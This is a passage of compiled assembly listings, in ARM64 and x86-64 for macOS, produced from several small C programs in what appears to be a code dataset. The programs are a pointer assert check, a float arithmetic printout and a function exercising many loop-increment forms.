@.str.51 .asciz "HIGH" L_.str.52: ## @.str.52 .asciz "\342\226\224" L_.str.53: ## @.str.53 .asciz "DROWN" L_.str.54: ## @.str.54 .asciz "\342\225\262" L_.str.55: ## @.str.55 .asciz "STX" L_.str.56: ## @.str.56 .asciz "\"" L_.str.57: ## @.str.57 .asciz "ETX" L_.str.58: ## @.str.58 .asciz "SKIP" L_.str.59: ## @.str.59 .asciz "0" .subsections_via_symbols
the_stack_data/98574445.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _initialize ; -- Begin function initialize .p2align 2 _initialize: ; @initialize .cfi_startproc ; %bb.0: adrp x8, _x@GOTPAGE ldr x8, [x8, _x@GOTPAGEOFF] mov w9, #3 str w9, [x8] adrp x9, _p@GOTPAGE ldr x9, [x9, _p@GOTPAGEOFF] str x8, [x9] ret .cfi_endproc ; -- End function .globl _checkpoint ; -- Begin function checkpoint .p2align 2 _checkpoint: ; @checkpoint .cfi_startproc ; %bb.0: ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] bl _initialize bl _checkpoint adrp x8, _p@GOTPAGE ldr x8, [x8, _p@GOTPAGEOFF] ldr x8, [x8] ldr w8, [x8] subs w8, w8, #3 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #21 adrp x3, l_.str.1@PAGE add x3, x3, l_.str.1@PAGEOFF bl ___assert_rtn LBB2_2: b LBB2_3 LBB2_3: mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .comm _x,4,2 ; @x .comm _p,8,3 ; @p .section __TEXT,__cstring,cstring_literals l___func__.main: ; @__func__.main .asciz "main" l_.str: ; @.str .asciz "40762551.c" l_.str.1: ; @.str.1 .asciz "*(int *)p == 3" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _initialize ## -- Begin function initialize .p2align 4, 0x90 _initialize: ## @initialize .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _x@GOTPCREL(%rip), %rax movl $3, (%rax) movq _p@GOTPCREL(%rip), %rax movq _x@GOTPCREL(%rip), %rcx movq %rcx, (%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _checkpoint ## -- Begin function checkpoint .p2align 4, 0x90 _checkpoint: ## @checkpoint .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _initialize callq _checkpoint movq _p@GOTPCREL(%rip), %rax movq (%rax), %rax cmpl $3, (%rax) sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB2_2 ## %bb.1: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.1(%rip), %rcx movl $21, %edx callq ___assert_rtn LBB2_2: jmp LBB2_3 LBB2_3: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _x,4,2 ## @x .comm _p,8,3 ## @p .section __TEXT,__cstring,cstring_literals L___func__.main: ## @__func__.main .asciz "main" L_.str: ## @.str .asciz "40762551.c" L_.str.1: ## @.str.1 .asciz "*(int *)p == 3" .subsections_via_symbols
the_stack_data/40762551.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #16] ; 4-byte Folded Spill stur wzr, [x29, #-4] mov w8, #13107 movk w8, #16419, lsl #16 fmov s0, w8 stur s0, [x29, #-12] ldur s1, [x29, #-12] fmov s0, #3.00000000 fmul s0, s0, s1 ldur s1, [x29, #-12] fmul s0, s0, s1 ldur s1, [x29, #-12] ldur s3, [x29, #-12] fmov s2, #5.00000000 fmul s2, s2, s3 ldur s3, [x29, #-12] fmul s2, s2, s3 fmadd s0, s0, s1, s2 fmov s1, #6.00000000 fadd s0, s0, s1 stur s0, [x29, #-8] ldur s0, [x29, #-8] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr w0, [sp, #16] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "result = %f" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function main LCPI0_0: .long 0x40c00000 ## float 6 LCPI0_1: .long 0x40a00000 ## float 5 LCPI0_2: .long 0x40400000 ## float 3 LCPI0_3: .long 0x40233333 ## float 2.54999995 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movss LCPI0_3(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -12(%rbp) movss LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero mulss -12(%rbp), %xmm0 mulss -12(%rbp), %xmm0 movss -12(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero movss LCPI0_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss -12(%rbp), %xmm1 mulss -12(%rbp), %xmm1 mulss %xmm2, %xmm0 addss %xmm1, %xmm0 movss LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero addss %xmm1, %xmm0 movss %xmm0, -8(%rbp) movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str(%rip), %rdi movb $1, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "result = %f" .subsections_via_symbols
the_stack_data/97013034.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ; -- Begin function foo .p2align 2 _foo: ; @foo .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #1 stur w8, [x29, #-8] mov w8, #30 stur w8, [x29, #-12] mov w8, #4 stur w8, [x29, #-16] mov x8, #4 stur x8, [x29, #-24] str xzr, [sp, #32] ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-16] subs w9, w8, #1 ldur w8, [x29, #-4] add w8, w8, w9 stur w8, [x29, #-4] b LBB0_1 LBB0_4: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 ldur w8, [x29, #-16] subs w9, w8, #1 ldur w8, [x29, #-4] add w8, w8, w9 stur w8, [x29, #-4] b LBB0_5 LBB0_8: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_9 LBB0_9: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_12 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_9 Depth=1 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_9 Depth=1 ldur w8, [x29, #-16] subs w0, w8, #1 bl _bar ldur w8, [x29, #-4] add w8, w8, w0 stur w8, [x29, #-4] b LBB0_9 LBB0_12: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_13 LBB0_13: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_16 b LBB0_14 LBB0_14: ; in Loop: Header=BB0_13 Depth=1 b LBB0_15 LBB0_15: ; in Loop: Header=BB0_13 Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-16] add w8, w8, w9 subs w8, w8, #1 stur w8, [x29, #-4] b LBB0_13 LBB0_16: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_17 LBB0_17: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_20 b LBB0_18 LBB0_18: ; in Loop: Header=BB0_17 Depth=1 b LBB0_19 LBB0_19: ; in Loop: Header=BB0_17 Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-16] subs w9, w9, #1 add w8, w8, w9 stur w8, [x29, #-4] b LBB0_17 LBB0_20: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_21 LBB0_21: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_24 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_21 Depth=1 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_21 Depth=1 ldur w8, [x29, #-4] str w8, [sp, #4] ; 4-byte Folded Spill ldur w8, [x29, #-16] subs w0, w8, #1 bl _bar ldr w8, [sp, #4] ; 4-byte Folded Reload add w8, w8, w0 stur w8, [x29, #-4] b LBB0_21 LBB0_24: ldur w8, [x29, #-8] str w8, [sp, #28] ldr w8, [sp, #28] str w8, [sp, #24] ldr w8, [sp, #24] stur w8, [x29, #-4] b LBB0_25 LBB0_25: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_28 b LBB0_26 LBB0_26: ; in Loop: Header=BB0_25 Depth=1 b LBB0_27 LBB0_27: ; in Loop: Header=BB0_25 Depth=1 ldur w8, [x29, #-4] add w8, w8, #1 stur w8, [x29, #-4] b LBB0_25 LBB0_28: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_29 LBB0_29: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] str w9, [sp, #20] ldr w9, [sp, #20] str w9, [sp, #16] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_32 b LBB0_30 LBB0_30: ; in Loop: Header=BB0_29 Depth=1 b LBB0_31 LBB0_31: ; in Loop: Header=BB0_29 Depth=1 ldur w8, [x29, #-4] add w8, w8, #1 stur w8, [x29, #-4] b LBB0_29 LBB0_32: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_33 LBB0_33: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_36 b LBB0_34 LBB0_34: ; in Loop: Header=BB0_33 Depth=1 b LBB0_35 LBB0_35: ; in Loop: Header=BB0_33 Depth=1 mov w8, #1 str w8, [sp, #12] ldr w8, [sp, #12] str w8, [sp, #8] ldr w9, [sp, #8] ldur w8, [x29, #-4] add w8, w8, w9 stur w8, [x29, #-4] b LBB0_33 LBB0_36: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_37 LBB0_37: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_40 b LBB0_38 LBB0_38: ; in Loop: Header=BB0_37 Depth=1 b LBB0_39 LBB0_39: ; in Loop: Header=BB0_37 Depth=1 ldur w8, [x29, #-16] add w9, w8, #1 ldur w8, [x29, #-4] add w8, w8, w9 stur w8, [x29, #-4] b LBB0_37 LBB0_40: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_41 LBB0_41: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_44 b LBB0_42 LBB0_42: ; in Loop: Header=BB0_41 Depth=1 b LBB0_43 LBB0_43: ; in Loop: Header=BB0_41 Depth=1 ldur x9, [x29, #-24] ldursw x8, [x29, #-4] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_41 LBB0_44: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_45 LBB0_45: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_48 b LBB0_46 LBB0_46: ; in Loop: Header=BB0_45 Depth=1 b LBB0_47 LBB0_47: ; in Loop: Header=BB0_45 Depth=1 ldursw x8, [x29, #-4] ldur x9, [x29, #-24] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_45 LBB0_48: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_49 LBB0_49: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_52 b LBB0_50 LBB0_50: ; in Loop: Header=BB0_49 Depth=1 b LBB0_51 LBB0_51: ; in Loop: Header=BB0_49 Depth=1 ldur x8, [x29, #-24] add x8, x8, #1 ldursw x9, [x29, #-4] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_49 LBB0_52: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_53 LBB0_53: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_56 b LBB0_54 LBB0_54: ; in Loop: Header=BB0_53 Depth=1 b LBB0_55 LBB0_55: ; in Loop: Header=BB0_53 Depth=1 ldur x8, [x29, #-24] ldursw x9, [x29, #-16] add x8, x8, x9 ldursw x9, [x29, #-4] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_53 LBB0_56: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_57 LBB0_57: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_60 b LBB0_58 LBB0_58: ; in Loop: Header=BB0_57 Depth=1 b LBB0_59 LBB0_59: ; in Loop: Header=BB0_57 Depth=1 ldur x8, [x29, #-24] ldr x9, [sp, #32] add x9, x8, x9 ldursw x8, [x29, #-4] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_57 LBB0_60: ldur w8, [x29, #-8] stur w8, [x29, #-4] b LBB0_61 LBB0_61: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_64 b LBB0_62 LBB0_62: ; in Loop: Header=BB0_61 Depth=1 b LBB0_63 LBB0_63: ; in Loop: Header=BB0_61 Depth=1 ldursw x8, [x29, #-4] ldur x9, [x29, #-24] add x8, x8, x9 ldr x9, [sp, #32] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_61 LBB0_64: ldur w8, [x29, #-12] stur w8, [x29, #-4] b LBB0_65 LBB0_65: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_68 b LBB0_66 LBB0_66: ; in Loop: Header=BB0_65 Depth=1 b LBB0_67 LBB0_67: ; in Loop: Header=BB0_65 Depth=1 ldur x9, [x29, #-24] ldursw x8, [x29, #-4] subs x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_65 LBB0_68: ldur w8, [x29, #-12] stur w8, [x29, #-4] b LBB0_69 LBB0_69: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_72 b LBB0_70 LBB0_70: ; in Loop: Header=BB0_69 Depth=1 b LBB0_71 LBB0_71: ; in Loop: Header=BB0_69 Depth=1 ldr x9, [sp, #32] ldursw x8, [x29, #-4] subs x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_69 LBB0_72: ldur w8, [x29, #-12] stur w8, [x29, #-4] b LBB0_73 LBB0_73: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_76 b LBB0_74 LBB0_74: ; in Loop: Header=BB0_73 Depth=1 b LBB0_75 LBB0_75: ; in Loop: Header=BB0_73 Depth=1 ldur x8, [x29, #-24] ldr x9, [sp, #32] add x9, x8, x9 ldursw x8, [x29, #-4] subs x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 stur w8, [x29, #-4] b LBB0_73 LBB0_76: ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ## -- Begin function foo .p2align 4, 0x90 _foo: ## @foo .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl $1, -8(%rbp) movl $30, -12(%rbp) movl $4, -16(%rbp) movq $4, -24(%rbp) movq $0, -32(%rbp) movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_3 LBB0_3: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %eax subl $1, %eax addl -4(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_1 LBB0_4: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_5 Depth=1 movl -16(%rbp), %eax subl $1, %eax addl -4(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_5 LBB0_8: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_9: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_12 ## %bb.10: ## in Loop: Header=BB0_9 Depth=1 jmp LBB0_11 LBB0_11: ## in Loop: Header=BB0_9 Depth=1 movl -16(%rbp), %edi subl $1, %edi callq _bar addl -4(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_9 LBB0_12: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_13: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_16 ## %bb.14: ## in Loop: Header=BB0_13 Depth=1 jmp LBB0_15 LBB0_15: ## in Loop: Header=BB0_13 Depth=1 movl -4(%rbp), %eax addl -16(%rbp), %eax subl $1, %eax movl %eax, -4(%rbp) jmp LBB0_13 LBB0_16: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_17: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_20 ## %bb.18: ## in Loop: Header=BB0_17 Depth=1 jmp LBB0_19 LBB0_19: ## in Loop: Header=BB0_17 Depth=1 movl -4(%rbp), %eax movl -16(%rbp), %ecx subl $1, %ecx addl %ecx, %eax movl %eax, -4(%rbp) jmp LBB0_17 LBB0_20: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_21: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_24 ## %bb.22: ## in Loop: Header=BB0_21 Depth=1 jmp LBB0_23 LBB0_23: ## in Loop: Header=BB0_21 Depth=1 movl -4(%rbp), %eax movl %eax, -60(%rbp) ## 4-byte Spill movl -16(%rbp), %edi subl $1, %edi callq _bar movl %eax, %ecx movl -60(%rbp), %eax ## 4-byte Reload addl %ecx, %eax movl %eax, -4(%rbp) jmp LBB0_21 LBB0_24: movl -8(%rbp), %eax movl %eax, -36(%rbp) movl -36(%rbp), %eax movl %eax, -40(%rbp) movl -40(%rbp), %eax movl %eax, -4(%rbp) LBB0_25: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_28 ## %bb.26: ## in Loop: Header=BB0_25 Depth=1 jmp LBB0_27 LBB0_27: ## in Loop: Header=BB0_25 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB0_25 LBB0_28: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_29: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax movl -12(%rbp), %ecx movl %ecx, -44(%rbp) movl -44(%rbp), %ecx movl %ecx, -48(%rbp) cmpl -48(%rbp), %eax jg LBB0_32 ## %bb.30: ## in Loop: Header=BB0_29 Depth=1 jmp LBB0_31 LBB0_31: ## in Loop: Header=BB0_29 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB0_29 LBB0_32: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_33: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_36 ## %bb.34: ## in Loop: Header=BB0_33 Depth=1 jmp LBB0_35 LBB0_35: ## in Loop: Header=BB0_33 Depth=1 movl $1, -52(%rbp) movl -52(%rbp), %eax movl %eax, -56(%rbp) movl -56(%rbp), %eax addl -4(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_33 LBB0_36: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_37: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_40 ## %bb.38: ## in Loop: Header=BB0_37 Depth=1 jmp LBB0_39 LBB0_39: ## in Loop: Header=BB0_37 Depth=1 movl -16(%rbp), %eax addl $1, %eax addl -4(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_37 LBB0_40: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_41: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_44 ## %bb.42: ## in Loop: Header=BB0_41 Depth=1 jmp LBB0_43 LBB0_43: ## in Loop: Header=BB0_41 Depth=1 movq -24(%rbp), %rcx movslq -4(%rbp), %rax addq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_41 LBB0_44: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_45: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_48 ## %bb.46: ## in Loop: Header=BB0_45 Depth=1 jmp LBB0_47 LBB0_47: ## in Loop: Header=BB0_45 Depth=1 movslq -4(%rbp), %rax addq -24(%rbp), %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_45 LBB0_48: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_49: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_52 ## %bb.50: ## in Loop: Header=BB0_49 Depth=1 jmp LBB0_51 LBB0_51: ## in Loop: Header=BB0_49 Depth=1 movq -24(%rbp), %rax addq $1, %rax movslq -4(%rbp), %rcx addq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_49 LBB0_52: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_53: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_56 ## %bb.54: ## in Loop: Header=BB0_53 Depth=1 jmp LBB0_55 LBB0_55: ## in Loop: Header=BB0_53 Depth=1 movq -24(%rbp), %rax movslq -16(%rbp), %rcx addq %rcx, %rax movslq -4(%rbp), %rcx addq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_53 LBB0_56: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_57: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_60 ## %bb.58: ## in Loop: Header=BB0_57 Depth=1 jmp LBB0_59 LBB0_59: ## in Loop: Header=BB0_57 Depth=1 movq -24(%rbp), %rcx addq -32(%rbp), %rcx movslq -4(%rbp), %rax addq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_57 LBB0_60: movl -8(%rbp), %eax movl %eax, -4(%rbp) LBB0_61: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_64 ## %bb.62: ## in Loop: Header=BB0_61 Depth=1 jmp LBB0_63 LBB0_63: ## in Loop: Header=BB0_61 Depth=1 movslq -4(%rbp), %rax addq -24(%rbp), %rax addq -32(%rbp), %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_61 LBB0_64: movl -12(%rbp), %eax movl %eax, -4(%rbp) LBB0_65: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -8(%rbp), %eax jl LBB0_68 ## %bb.66: ## in Loop: Header=BB0_65 Depth=1 jmp LBB0_67 LBB0_67: ## in Loop: Header=BB0_65 Depth=1 movq -24(%rbp), %rcx movslq -4(%rbp), %rax subq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_65 LBB0_68: movl -12(%rbp), %eax movl %eax, -4(%rbp) LBB0_69: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -8(%rbp), %eax jl LBB0_72 ## %bb.70: ## in Loop: Header=BB0_69 Depth=1 jmp LBB0_71 LBB0_71: ## in Loop: Header=BB0_69 Depth=1 movq -32(%rbp), %rcx movslq -4(%rbp), %rax subq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_69 LBB0_72: movl -12(%rbp), %eax movl %eax, -4(%rbp) LBB0_73: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -8(%rbp), %eax jl LBB0_76 ## %bb.74: ## in Loop: Header=BB0_73 Depth=1 jmp LBB0_75 LBB0_75: ## in Loop: Header=BB0_73 Depth=1 movq -24(%rbp), %rcx addq -32(%rbp), %rcx movslq -4(%rbp), %rax subq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -4(%rbp) jmp LBB0_73 LBB0_76: addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/99815.c
